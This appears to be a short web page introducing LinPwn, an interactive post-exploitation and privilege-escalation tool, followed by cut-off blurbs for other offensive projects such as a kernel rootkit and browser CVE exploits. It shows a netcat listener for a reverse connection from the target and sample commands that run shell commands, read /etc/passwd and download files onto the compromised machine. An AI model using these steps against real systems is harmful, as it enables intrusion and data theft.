LinPwn is a interactive tool created to assist you in post exploitation enumeration and privilege escalation.
Connection
nc -lvp PORT
on your machine and then run LinPwn on the target machine to get a connection.(LinPwn: Shell) > id
(LinPwn: ReadFile)> /etc/passwd
(LinPwn) > enumerate
(LinPwn: Download) > https://exampleurl.com/file_to_download
I included a file called build.sh this is optional run bash build.sh
to view the build options if you wish to use them.
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…
Embark on the journey of becoming a certified Red Team professional with our definitive guide.…
This repository contains proof of concept exploits for CVE-2024-5836 and CVE-2024-6778, which are vulnerabilities within…
This took me like 4 days (+2 days for an update), but I got it…
MaLDAPtive is a framework for LDAP SearchFilter parsing, obfuscation, deobfuscation and detection. Its foundation is…